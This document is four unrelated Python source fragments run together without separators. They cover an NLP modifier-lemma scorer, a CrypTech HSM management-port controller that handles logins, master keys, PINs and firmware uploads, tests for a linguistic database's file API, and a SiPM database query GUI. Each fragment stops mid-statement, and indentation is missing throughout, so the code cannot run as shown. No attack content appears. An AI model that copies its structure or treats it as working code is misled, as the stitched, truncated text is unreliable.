# Check if lemma is among modifier lemmas
if modifier_lemmas.get(attractor_lemma, None) is None:
return False
else:
# Exclude rare observations
if modifier_lemmas[attractor_lemma]['[MODIFIERS WITH FREQ]'] < 1:
return False
return True
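# Data shapes assumed by the scorer above (inferred from its lookups, not from a
# schema definition): attractor_table['[CONTEXT TOKENS]'][attractor]['[LEMMA]'] holds
# the attractor's lemma, and modifier_lemmas[lemma]['[MODIFIERS WITH FREQ]'] holds an
# observation count, e.g. (hypothetical values):
#
#     modifier_lemmas = {'fast': {'[MODIFIERS WITH FREQ]': 12}}
#     attractor_table = {'[CONTEXT TOKENS]': {'faster': {'[LEMMA]': 'fast'}}}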
def _reformat_modifiers(modifiers_entry, seed_cluster):
""" Re-formats modifier table entries for faster lookup of scores """
# Reformat seed modifiers
modifier_tokens = dict()
modifier_lemmas = dict()
    # Guard against a missing seed cluster before indexing into the entry
    if not modifiers_entry.get(seed_cluster, None):
        return modifier_tokens, modifier_lemmas
    metric_keys = [key for key in modifiers_entry[seed_cluster].keys() if key.startswith('[MODIFIERS WITH ')]
# Iterate
for mod_lemma in modifiers_entry[seed_cluster]['[MODIFIERS]'].keys():
# Restrict to adjectives
if 'amod' in modifiers_entry[seed_cluster]['[MODIFIERS]'][mod_lemma]['[DEP TAGS]'] and \
'ADJ' in modifiers_entry[seed_cluster]['[MODIFIERS]'][mod_lemma]['[POS]']:
modifier_lemmas[mod_lemma] = dict()
for metric in metric_keys:
#!/usr/bin/env python
# Copyright (c) 2019 Diamond Key Security, NFP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# - Neither the name of the NORDUnet nor the names of its contributors may
# be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import os.path
import time
from enum import IntEnum
from cryptech.upload import ManagementPortSerial, send_file
from cryptech_port import DKS_HALError
from stoppable_thread import stoppable_thread
from statusobject import StatusObject, SetStatus
from hsm import UploadArgs
HSM_BINARY_FILE = "hsm-190821a.bin"
BOOTLOADER_BINARY_FILE = "bootloader.bin"
FPGA_BITSTREAM_FILE = "alpha_fmc.bit"
class CTYError(IntEnum):
CTY_OK = 0,
CTY_NOT_CONNECTED = 1,
CTY_NOT_LOGGED_IN = 2,
CTY_INCORRECT_PASSWORD = 3,
CTY_ERROR = 4
class WaitFeedback(stoppable_thread):
def __init__(self, feedback_function):
self.feedback_function = feedback_function
self.index = -1
super(WaitFeedback, self).__init__(self.loop, "WaitFeedback")
def loop(self):
if (self.index != -1):
self.feedback_function('\b\b\b')
else:
self.feedback_function('\r\n')
self.index += 1
if ((self.index % 4) == 0): self.feedback_function(' - ')
elif ((self.index % 4) == 1): self.feedback_function(' \\ ')
elif ((self.index % 4) == 2): self.feedback_function(' | ')
elif ((self.index % 4) == 3): self.feedback_function(' / ')
time.sleep(0.125)
@classmethod
def Start(cls, feedback_function):
feedback = cls(feedback_function)
feedback.start()
return feedback
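    # Usage pattern (as used by CTYConnection below): WaitFeedback.Start() returns the
    # running spinner thread, and the class is used as a context manager, e.g.
    #
    #     with WaitFeedback.Start(self.feedback):
    #         ...long-running serial operation...
    #
    # The context-manager protocol itself is assumed to come from stoppable_thread.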
class CTYConnection(StatusObject):
"""High-level interface for connecting to alpha's CTY port """
def __init__(self, cty_list, binary_path, feedback_function):
super(CTYConnection, self).__init__()
self.cty_list = cty_list
self.is_logged_in = False
self.binary_path = binary_path
self.feedback_function = feedback_function
self.errors = { CTYError.CTY_OK:"Connection to CrypTech Management Port successful",
CTYError.CTY_NOT_CONNECTED:"Not connected to a CrypTech device",
CTYError.CTY_NOT_LOGGED_IN:"Not logged in to a CrypTech device",
CTYError.CTY_INCORRECT_PASSWORD:"<PASSWORD>",
CTYError.CTY_ERROR:"Error sending command to CrypTech device" }
def get_error_msg(self, error):
if(error in self.errors):
return self.errors[error]
else:
return "Unknown CTY error"
@property
def cty_count(self):
return len(self.cty_list)
def is_cty_connected(self):
return self.cty_count > 0
def feedback(self, message):
if (self.feedback_function is not None):
self.feedback_function(message)
def send_raw(self, cmd, serial, delay):
cryptech_prompt = "\r\ncryptech> "
response_from_device = ""
serial.write(cmd)
serial.read_timeout = 0.5
for _ in xrange(0, delay):
time.sleep(1)
response_from_device = "%s%s"%(response_from_device, serial.read())
if(response_from_device.endswith(cryptech_prompt)):
response_from_device = response_from_device[:-len(cryptech_prompt)]
break
serial.read_timeout = None
return response_from_device
def send_raw_all(self, cmd, delay):
response = ''
with SetStatus(self, "Sending raw command"):
for device_index in xrange(0, len(self.cty_list)):
response_from_device = ""
with WaitFeedback.Start(self.feedback):
management_port_serial = self.cty_list[device_index].serial
response_from_device = self.send_raw(cmd, management_port_serial, delay)
response = '%s\r\nCTY:%i-%s'%(response, device_index, response_from_device)
return "--------------%s--------------"%response
def login(self, username, pin):
# make sure we're actually connected to an alpha
if(not self.is_cty_connected()): return CTYError.CTY_NOT_CONNECTED
self.logout()
with SetStatus(self, "Logging in"):
with WaitFeedback.Start(self.feedback):
for hsm_cty in self.cty_list:
management_port_serial = hsm_cty.serial
management_port_serial.args.username = username
management_port_serial.args.pin = pin
# use execute to login
response = management_port_serial.execute("\r")
if not response.endswith(("> ", "# ")):
return CTYError.CTY_INCORRECT_PASSWORD
# clear PIN
management_port_serial.args.pin = '1234'
self.is_logged_in = True
return CTYError.CTY_OK
def logout(self):
# make sure we're actually connected to an alpha
if(not self.is_cty_connected()): return CTYError.CTY_NOT_CONNECTED
with SetStatus(self, "Logging out"):
with WaitFeedback.Start(self.feedback):
for hsm_cty in self.cty_list:
management_port_serial = hsm_cty.serial
management_port_serial.write("\r")
prompt = management_port_serial.read()
assert "bootloader" not in prompt
if not prompt.endswith("Username: "):
management_port_serial.write("exit\r")
prompt = management_port_serial.read()
if not prompt.endswith("Username: "):
return CTYError.CTY_ERROR
self.is_logged_in = False
return CTYError.CTY_OK
def setMasterKey(self, masterkey):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
if masterkey is not None:
cmd = "masterkey set %s\r"%masterkey
else:
cmd = "masterkey set\r"
        self.feedback('\r\nSetting master key. This may take up to 45 seconds.')
with SetStatus(self, "Setting Master Key"):
for i in xrange(0, len(self.cty_list)):
with WaitFeedback.Start(self.feedback):
# set the master key on one alpha and get the result
management_port_serial = self.cty_list[i].serial
time.sleep(20)
management_port_serial.write(cmd)
response = management_port_serial.read()
if("Failed" in response):
return response
                    response = response.strip("\r\n")  # strip() returns a new string; keep the result
try:
if(i == 0):
# this is the first one
# parse the result to get the master key
split_reponse = response.split()
# find the start
start = 1
for token in split_reponse:
if('key:' in token):
break
start += 1
# tokens from (start) to (start+7) are the master key
masterkey = ""
                            # use a separate index to avoid shadowing the outer device index `i`
                            for k in xrange(start, start+8):
                                masterkey += "%s "%split_reponse[k]
# send master key to all other alphas
cmd = "masterkey set %s\r"%masterkey
except Exception as e:
return "Failed parsing output from CTY:%i - %s"%(i, e.message)
# show the result to the user
return "\r\n\r\nSuccess:%s key:\r\n%s\r\n"%(split_reponse[start-2], masterkey)
def _parseMKMStatus(self, status):
if (status.startswith("Set")):
return DKS_HALError.HAL_OK
elif (status.startswith("Not set")):
return DKS_HALError.HAL_ERROR_MASTERKEY_NOT_SET
else:
return DKS_HALError.HAL_ERROR_MASTERKEY_FAIL
def getMasterKeyStatus(self):
cmd = "masterkey status\r"
result = []
with SetStatus(self, "Getting Master Key Status"):
for device_index in xrange(len(self.cty_list)):
response_from_device = ""
with WaitFeedback.Start(self.feedback):
management_port_serial = self.cty_list[device_index].serial
response_from_device = self.send_raw(cmd, management_port_serial, 2)
# parse the response
lines = response_from_device.splitlines()
status = {}
for line in lines:
if (line.startswith(" volatile: ")):
status['volatile'] = self._parseMKMStatus(line[len(" volatile: "):])
elif (line.startswith(" flash: ")):
status['flash'] = self._parseMKMStatus(line[len(" flash: "):])
result.append(status)
return result
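    # Return shape (as assembled above): a list with one dict per CTY device, e.g.
    # [{'volatile': DKS_HALError.HAL_OK, 'flash': DKS_HALError.HAL_ERROR_MASTERKEY_NOT_SET}, ...]
    # (example values are illustrative; actual values depend on the device response).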
def setPassword(self, user, newPIN):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
cmd = "\rkeystore set pin %s %s\r"%(user, newPIN)
with SetStatus(self, "Setting Password"):
for hsm_cty in self.cty_list:
with WaitFeedback.Start(self.feedback):
management_port_serial = hsm_cty.serial
management_port_serial.write(cmd)
time.sleep(8)
# get response
management_port_serial.read()
# make sure we get the real prompt
management_port_serial.write("\r")
management_port_serial.read()
return CTYError.CTY_OK
def clearKeyStore(self, preservePINs):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
cmd = "keystore erase YesIAmSure"
if(preservePINs):
cmd += ' preservePINs'
cmd += '\r'
        self.feedback('\r\nClearing the keystore. This may take up to 45 seconds.')
with SetStatus(self, "Clearing Keystore"):
with WaitFeedback.Start(self.feedback):
for hsm_cty in self.cty_list:
management_port_serial = hsm_cty.serial
management_port_serial.write(cmd)
prompt = management_port_serial.read()
print prompt
time.sleep(45)
return CTYError.CTY_OK
def uploadFPGABitStream(self, username, PIN, cty_index = None):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
name = os.path.join(self.binary_path, FPGA_BITSTREAM_FILE)
upload_args = UploadArgs(fpga = True, pin = PIN, username=username)
if (cty_index is None):
with SetStatus(self, "Updating CrypTech FPGA Bitstream - ALL"):
return self._do_upload(name = name, upload_args = upload_args, cty_index = cty_index)
else:
return self._do_upload(name = name, upload_args = upload_args, cty_index = cty_index)
def uploadBootloader(self, username, PIN, cty_index = None):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
name = os.path.join(self.binary_path, BOOTLOADER_BINARY_FILE)
upload_args = UploadArgs(bootloader = True, pin = PIN, username=username)
if (cty_index is None):
with SetStatus(self, "Updating CrypTech Bootloader - ALL"):
return self._do_upload(name = name, upload_args = upload_args, cty_index = cty_index)
else:
return self._do_upload(name = name, upload_args = upload_args, cty_index = cty_index)
def uploadFirmware(self, username, PIN, cty_index = None):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
name = os.path.join(self.binary_path, HSM_BINARY_FILE)
upload_args = UploadArgs(firmware = True, pin = PIN, username=username)
if (cty_index is None):
with SetStatus(self, "Updating CrypTech Firmware - ALL"):
return self._do_upload(name = name, upload_args = upload_args, cty_index = cty_index)
else:
return self._do_upload(name = name, upload_args = upload_args, cty_index = cty_index)
def uploadTamperFirmware(self, username, PIN, cty_index = None):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
        return self._do_upload(self.binary_path +
# Copyright 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import logging
import simplejson as json
import os
from base64 import b64encode
from nose.tools import nottest
from mimetypes import guess_type
from onlinelinguisticdatabase.tests import TestController, url
import onlinelinguisticdatabase.model as model
from onlinelinguisticdatabase.model.meta import Session
import onlinelinguisticdatabase.lib.helpers as h
from onlinelinguisticdatabase.lib.SQLAQueryBuilder import SQLAQueryBuilder
try:
import Image
except ImportError:
try:
from PIL import Image
except ImportError:
Image = None
log = logging.getLogger(__name__)
class TestFilesController(TestController):
def tearDown(self):
TestController.tearDown(self, del_global_app_set=True,
dirs_to_clear=['files_path', 'reduced_files_path'])
@nottest
def test_index(self):
"""Tests that GET /files returns a JSON array of files with expected values."""
# Test that the restricted tag is working correctly.
# First get the users.
users = h.get_users()
contributor_id = [u for u in users if u.role == u'contributor'][0].id
# Then add a contributor and a restricted tag.
restricted_tag = h.generate_restricted_tag()
my_contributor = h.generate_default_user()
my_contributor_first_name = u'Mycontributor'
my_contributor.first_name = my_contributor_first_name
Session.add_all([restricted_tag, my_contributor])
Session.commit()
my_contributor = Session.query(model.User).filter(
model.User.first_name == my_contributor_first_name).first()
my_contributor_id = my_contributor.id
restricted_tag = h.get_restricted_tag()
# Then add the default application settings with my_contributor as the
# only unrestricted user.
application_settings = h.generate_default_application_settings()
application_settings.unrestricted_users = [my_contributor]
Session.add(application_settings)
Session.commit()
# Finally, issue two POST requests to create two default files with the
# *default* contributor as the enterer. One file will be restricted and
# the other will not be.
extra_environ = {'test.authentication.id': contributor_id,
'test.application_settings': True}
wav_file_path = os.path.join(self.test_files_path, 'old_test.wav')
wav_file_base64_encoded = b64encode(open(wav_file_path).read())
jpg_file_path = os.path.join(self.test_files_path, 'old_test.jpg')
jpg_file_base64_encoded = b64encode(open(jpg_file_path).read())
# Create the restricted file.
params = self.file_create_params_base64.copy()
params.update({
'filename': u'test_restricted_file.wav',
'base64_encoded_file': wav_file_base64_encoded,
'tags': [h.get_tags()[0].id] # the restricted tag should be the only one
})
params = json.dumps(params)
response = self.app.post(url('files'), params, self.json_headers,
extra_environ)
resp = json.loads(response.body)
restricted_file_id = resp['id']
# Create the unrestricted file.
params = self.file_create_params_base64.copy()
params.update({
'filename': u'test_unrestricted_file.jpg',
'base64_encoded_file': jpg_file_base64_encoded
})
params = json.dumps(params)
response = self.app.post(url('files'), params, self.json_headers,
extra_environ)
resp = json.loads(response.body)
# Expectation: the administrator, the default contributor (qua enterer)
# and the unrestricted my_contributor should all be able to view both files.
# The viewer will only receive the unrestricted file.
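        # Expected visibility (checked by the assertions that follow): administrator -> 2
        # files, default contributor (enterer) -> 2, unrestricted contributor -> 2,
        # viewer -> 1 (the restricted file is hidden from viewers).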
# An administrator should be able to view both files.
extra_environ = {'test.authentication.role': 'administrator',
'test.application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 2
assert resp[0]['filename'] == u'test_restricted_file.wav'
assert resp[1]['filename'] == u'test_unrestricted_file.jpg'
assert response.content_type == 'application/json'
# The default contributor (qua enterer) should also be able to view both
# files.
extra_environ = {'test.authentication.id': contributor_id,
'test.application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 2
# Mycontributor (an unrestricted user) should also be able to view both
# files.
extra_environ = {'test.authentication.id': my_contributor_id,
'test.application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 2
# A (not unrestricted) viewer should be able to view only one file.
extra_environ = {'test.authentication.role': 'viewer',
'test.application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 1
# Remove Mycontributor from the unrestricted users list and access to
# the second file will be denied.
application_settings = h.get_application_settings()
application_settings.unrestricted_users = []
Session.add(application_settings)
Session.commit()
# Mycontributor (no longer an unrestricted user) should now *not* be
# able to view the restricted file.
extra_environ = {'test.authentication.id': my_contributor_id,
'test.application_settings': True,
'test.retain_application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 1
# Remove the restricted tag from the file and the viewer should now be
# able to view it too.
restricted_file = Session.query(model.File).get(restricted_file_id)
restricted_file.tags = []
Session.add(restricted_file)
Session.commit()
extra_environ = {'test.authentication.role': 'viewer',
'test.application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 2
# Clear all Files (actually, everything but the tags, users and languages)
h.clear_all_models(['User', 'Tag', 'Language'])
# Now add 100 files. The even ones will be restricted, the odd ones not.
# These files will be deficient, i.e., have no binary data or MIME_type
# but that's ok ...
def create_file_from_index(index):
file = model.File()
file.filename = u'name_%d.jpg' % index
return file
files = [create_file_from_index(i) for i in range(1, 101)]
Session.add_all(files)
Session.commit()
files = h.get_files()
restricted_tag = h.get_restricted_tag()
for file in files:
if int(file.filename.split('_')[1].split('.')[0]) % 2 == 0:
file.tags.append(restricted_tag)
Session.add(file)
Session.commit()
files = h.get_files() # ordered by File.id ascending
# An administrator should be able to retrieve all of the files.
extra_environ = {'test.authentication.role': 'administrator',
'test.application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 100
assert resp[0]['filename'] == u'name_1.jpg'
assert resp[0]['id'] == files[0].id
# Test the paginator GET params.
paginator = {'items_per_page': 23, 'page': 3}
response = self.app.get(url('files'), paginator, headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp['items']) == 23
assert resp['items'][0]['filename'] == files[46].filename
# Test the order_by GET params.
order_by_params = {'order_by_model': 'File', 'order_by_attribute': 'filename',
'order_by_direction': 'desc'}
response = self.app.get(url('files'), order_by_params,
headers=self.json_headers, extra_environ=extra_environ)
resp = json.loads(response.body)
result_set = sorted([f.filename for f in files], reverse=True)
assert result_set == [f['filename'] for f in resp]
assert response.content_type == 'application/json'
# Test the order_by *with* paginator.
params = {'order_by_model': 'File', 'order_by_attribute': 'filename',
'order_by_direction': 'desc', 'items_per_page': 23, 'page': 3}
response = self.app.get(url('files'), params,
headers=self.json_headers, extra_environ=extra_environ)
resp = json.loads(response.body)
assert result_set[46] == resp['items'][0]['filename']
# The default viewer should only be able to see the odd numbered files,
# even with a paginator.
items_per_page = 7
page = 7
paginator = {'items_per_page': items_per_page, 'page': page}
extra_environ = {'test.authentication.role': 'viewer',
'test.application_settings': True}
response = self.app.get(url('files'), paginator, headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp['items']) == items_per_page
assert resp['items'][0]['filename'] == u'name_%d.jpg' % (
((items_per_page * (page - 1)) * 2) + 1)
# Expect a 400 error when the order_by_direction param is invalid
order_by_params = {'order_by_model': 'File', 'order_by_attribute': 'filename',
'order_by_direction': 'descending'}
response = self.app.get(url('files'), order_by_params, status=400,
headers=self.json_headers, extra_environ=extra_environ)
resp = json.loads(response.body)
assert resp['errors']['order_by_direction'] == u"Value must be one of: asc; desc (not u'descending')"
# Expect the default BY id ASCENDING ordering when the order_by_model/Attribute
# param is invalid.
order_by_params = {'order_by_model': 'Fileage', 'order_by_attribute': 'nom',
'order_by_direction': 'desc'}
response = self.app.get(url('files'), order_by_params,
headers=self.json_headers, extra_environ=extra_environ)
resp = json.loads(response.body)
assert resp[0]['id'] == files[0].id
        # Expect a 400 error when the paginator GET params are empty, unspecified,
        # or integers less than 1
paginator = {'items_per_page': u'a', 'page': u''}
response = self.app.get(url('files'), paginator, headers=self.json_headers,
extra_environ=extra_environ, status=400)
resp = json.loads(response.body)
assert resp['errors']['items_per_page'] == u'Please enter an integer value'
assert resp['errors']['page'] == u'Please enter a value'
paginator = {'items_per_page': 0, 'page': -1}
response = self.app.get(url('files'), paginator, headers=self.json_headers,
extra_environ=extra_environ, status=400)
resp = json.loads(response.body)
assert resp['errors']['items_per_page'] == u'Please enter a number that is 1 or greater'
assert resp['errors']['page'] == u'Please enter a number that is 1 or greater'
assert response.content_type == 'application/json'
@nottest
def test_create(self):
"""Tests that POST /files correctly creates a new file."""
########################################################################
# base64-encoded file creation
########################################################################
# Pass some mal-formed JSON to test that a 400 error is returned.
params = u'"a' # Bad JSON
response = self.app.post(url('files'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
assert resp['error'] == u'JSON decode error: the parameters provided were not valid JSON.'
# Create a test audio file.
wav_file_path = os.path.join(self.test_files_path, 'old_test.wav')
wav_file_size = os.path.getsize(wav_file_path)
params = self.file_create_params_base64.copy()
params.update({
'filename': u'old_test.wav',
'base64_encoded_file': b64encode(open(wav_file_path).read())
})
params = json.dumps(params)
response = self.app.post(url('files'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
file_count = Session.query(model.File).count()
assert resp['filename'] == u'old_test.wav'
assert resp['MIME_type'] == u'audio/x-wav'
assert resp['size'] == wav_file_size
assert resp['enterer']['first_name'] == u'Admin'
assert file_count == 1
assert response.content_type == 'application/json'
# Create a test image file.
jpg_file_path = os.path.join(self.test_files_path, 'old_test.jpg')
jpg_file_size = os.path.getsize(jpg_file_path)
jpg_file_base64 = b64encode(open(jpg_file_path).read())
params = self.file_create_params_base64.copy()
params.update({
'filename': u'old_test.jpg',
'base64_encoded_file': jpg_file_base64
})
params = json.dumps(params)
response = self.app.post(url('files'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
file_count = Session.query(model.File).count()
file_id = an_image_id = resp['id']
assert resp['filename'] == u'old_test.jpg'
        assert
# -*- coding: utf-8 -*-
## File = "SipmQuerryRoot.py"
##
## Modified by cmj2018Mar28... Changed the directory structure and calls DataLoader versions so these could be accounted for.
## This version uses the old hdbClient_v1_3a
## Modified by cmj2018Mar28... Change "crvUtilities2017.zip" to "crvUtilities.zip"
## Modified by cmj2018May30... Change to hdbClient_v2_0
##
## Derived from File = "SipmQuerryRoot2017Jul27.py"\
## Derived from File = "SipmQuerry2017Jul22.py"
## Derived from File = "SipmQuerry2017Jul22.py"
## Derived from File = "extrusionQuerry2017Jul22.py"
## Derived from File = "extrusionQuerry2017Jul19.py"
##
## Use matplotlib to plot graphs
## Re-arrange the GUI...
## Include a list box to display all available batches
## Plot with PyRoot!
##
## Modified by cmj to add root extras!
##
## Derived from File = "extrusionQuerry2017Jul16.py"
## Derived from File = "extrusionQuerry2017Jul16.py"
## Derived from File = "extrusionQuerry2017Jul15.py"
## Derived from File = "extrusionQuerry2017Jul14.py"
## Derived from File = "extrusionQuerry2017Jul13.py"
##
#!/usr/bin/env python
##
## A python script that uses a Graphical User Interface
## to allow queries of the Sipm database and plot
## the test results.
##
## Written by <NAME>
## Department of Physics
## University of South Alabama
##
## Modified by cmj2018May31.... Include new Sipm Measurements types
## Modified by cmj2018Jul26... Initialize bytearray strings with each event in root tree
## Modified by cmj2018Oct5... Fix bug... return the Production database Query URL instead of the Write URL
## Modified by cmj2018Oct9.... Change to hdbClient_v2_2
## Modified by cmj2020Jun16... Change to cmjGuiLibGrid2019Jan30
## Modified by cmj2020Jul13... Add progress bar
## Modified by cmj 2020Aug03 cmjGuiLibGrid2019Jan30 -> cmjGuiLibGrid
## Modified by cmj2020Dec16... replace hdbClient_v2_2 with hdbClient_v3_3 - and (&) on query works
## Modified by cmj2021Mar1.... Convert from python2 to python3: 2to3 -w *.py
## Modified by cmj2021Mar1.... replace dataloader with dataloader3
## Modified by cmj2021May11... replace dataloader3.zip with dataloader.zip
## Modified by cmj2021May12... replaced tabs with 6 spaces to convert to python 3
## Modified by cmj2022Jan25... save character string in root tree with python3
## Modified by cmj2022Jan28... replace "count(*)" with single view table as per Steve's Email 2022Jan28 11:10 AM
##
from tkinter import * # get widget class
import tkinter as tk
from tkinter.ttk import * # get tkk widget class (for progess bar)
import sys
from collections import defaultdict ## needed for two dimensional dictionaries
sys.path.append("../../Utilities/hdbClient_v3_3/Dataloader.zip") ## 2021May11
sys.path.append("../CrvUtilities/crvUtilities.zip") ## 2020Jul02 add highlight to scrolled list
from DataLoader import *
from databaseConfig import *
from cmjGuiLibGrid import * ## 2020Aug03
from generalUtilities import generalUtilities ## this is needed for three dimensional dictionaries
##
import os
import sys ##
import optparse ## parser module... to parse the command line arguments
import math
import time
import array
## Import the graphing modules
## Import for PyRoot
import ROOT as _root ## import to define vectors which are used to save strings.. 2022Jan25
from ROOT import TCanvas, TFile, TProfile, TNtuple, TH1F, TH2F, TGraph, TStyle, TTree, TString
from ROOT import gROOT, gBenchmark, gRandom, gSystem, gStyle, Double_t
from array import array
##
##
ProgramName = "SipmQueryRoot"
Version = "version2022.01.28"
##
##
##
##
## -------------------------------------------------------------
## A class to set up the main window to drive the
## python GUI
##
class multiWindow(Frame):
      def __init__(self, parent=None, myRow = 0, myCol = 0):
Frame.__init__(self,parent)
self.__database_config = databaseConfig()
self.setupDevelopmentDatabase() ## set up communications with database
self.__cmjPlotDiag = 2 ## default... not debug messages printed out
## Limit number of sipms read in for tests.... set negative to read all
self.__cmjTest = 0 ## set this to 1 to look at 10 sipm_id's
self.__cmjTestLimit = 100 ## When in test mode... look at this number of sipms.
self.__progressBarCount = tk.DoubleVar() ## for progress bar
self.__progressBarCount.set(0) ## for progress bar
self.__progressBarMaximum = 100000
## set up geometry for GUI
self.__labelWidth = 25
self.__entryWidth = 20
self.__buttonWidth = 5
self.__maxRow = 2
## Arrays to plot...keep these in scope in the whole class
self.__sipmMeasureTestDate = {} ## first key of the nested dictionaries
self.__saveTestType = {} ## dictionary of test types; key sipmMeasureDate
## Define a series of nested dictionaries to hold various quantities:
## keys [sipmMeasureDate][sipmId]
self.__sipmId = defaultdict(dict) ## second key for nested dictionaries
self.__sipmNumber = defaultdict(dict)
self.__testType = defaultdict(dict)
self.__workerBarCode = defaultdict(dict)
self.__workStationBarCode = defaultdict(dict)
self.__biasVoltage = defaultdict(dict)
self.__darkCount = defaultdict(dict)
self.__gain = defaultdict(dict)
self.__temperature = defaultdict(dict)
self.__breakdown_voltage = defaultdict(dict)
self.__dark_count_rate = defaultdict(dict)
self.__current_vs_voltage_condition = defaultdict(dict)
self.__x_talk = defaultdict(dict)
self.__led_response = defaultdict(dict)
self.__data_file_location = defaultdict(dict)
self.__data_file_name = defaultdict(dict)
self.__pack_number = defaultdict(dict)
## Nested Dictionaries to save I vs V data for each sipm, each test
## The keys to these dictionaries are [sipmMeasureDate][SipmId][binNumber]
self.__sipmMeasureTestDate_IvsV = {} ## first key in triple nested dictionary
self.__sipmId_IvsV = defaultdict(dict) ## second key in triple nested dictionary [sipmMeasureDate][SipmId]
self.__myMultiDimDictionary = generalUtilities()
self.__IvsV_current = self.__myMultiDimDictionary.nestedDict()
self.__IvsV_voltage = self.__myMultiDimDictionary.nestedDict()
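            ## Access pattern for the I-vs-V dictionaries above (keys as documented):
            ## self.__IvsV_current[sipmMeasureDate][sipmId][binNumber] = current
            ## self.__IvsV_voltage[sipmMeasureDate][sipmId][binNumber] = voltage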
## Most times the Sipms are tested once, but at different times....
## save all local tests in one root tree with the test date tagged.
self.__allSipmId = {} ## key [testDate+sipmId[testDate]]
self.__allSipmMeasureTestDate = {} ## key [testDate+sipmId[testDate]]
self.__allTestType = {} # key [testDate+sipmId[testDate]
self.__allWorkerBarCode = {} ## key [testDate+sipmId[testDate]]
self.__allWorkStationBarCode = {} ## key [testDate+sipmId[testDate]]
self.__allBiasVoltage = {} ## key [testDate+sipmId[testDate]]
self.__allDarkCount = {} ## key [testDate+sipmId[testDate]]
self.__allGain = {} ## key [testDate+sipmId[testDate]]
self.__allTemperature = {} ## key [testDate+sipmId[testDate]])
self.__allBreakdown_voltage = {} ## key [testDate+sipmId[testDate]]
self.__allDark_count_rate = {} ## key [testDate+sipmId[testDate]]
self.__allCurrent_vs_voltage_condition = {} ## key [testDate+sipmId[testDate]]
self.__allX_talk = {} ## key [testDate+sipmId[testDate]]
self.__allLed_response = {} ## key [testDate+sipmId[testDate]]
self.__allData_file_location = {} ## key [testDate+sipmId[testDate]]
self.__allData_file_name = {} ## key [testDate+sipmId[testDate]]
self.__allPack_number = {} ## key [testDate+sipmId[testDate]]
## Nested Dictionaries to save I vs V data for each sipm, each test
## The keys to these dictionaries are [ivsvTestDate+sipmId[testDate]][binNumber]
self.__All_IvsV_current = defaultdict(dict)
self.__All_IvsV_voltage = defaultdict(dict)
##
self.__sipmResults = []
self.__sipmPackNumberResults = {} ## dictionary to hold pack number: Key SipmId
self.__sipmIvsVresults =[]
## Dictionary of arrays to hold the Sipm Batch information
self.__sipmBatch={}
## Define Output Log file... remove this later
self.__mySaveIt = saveResult()
self.__mySaveIt.setOutputFileName('sipmQuerries')
self.__mySaveIt.openFile()
self.__row = 0
self.__col = 0
self.__strName = []
self.__sCount = 0
##
##
##
## First Column...
self.__col = 0
self.__firstRow = 0
##
## Instruction Box...
self.__myInstructions = myScrolledText(self)
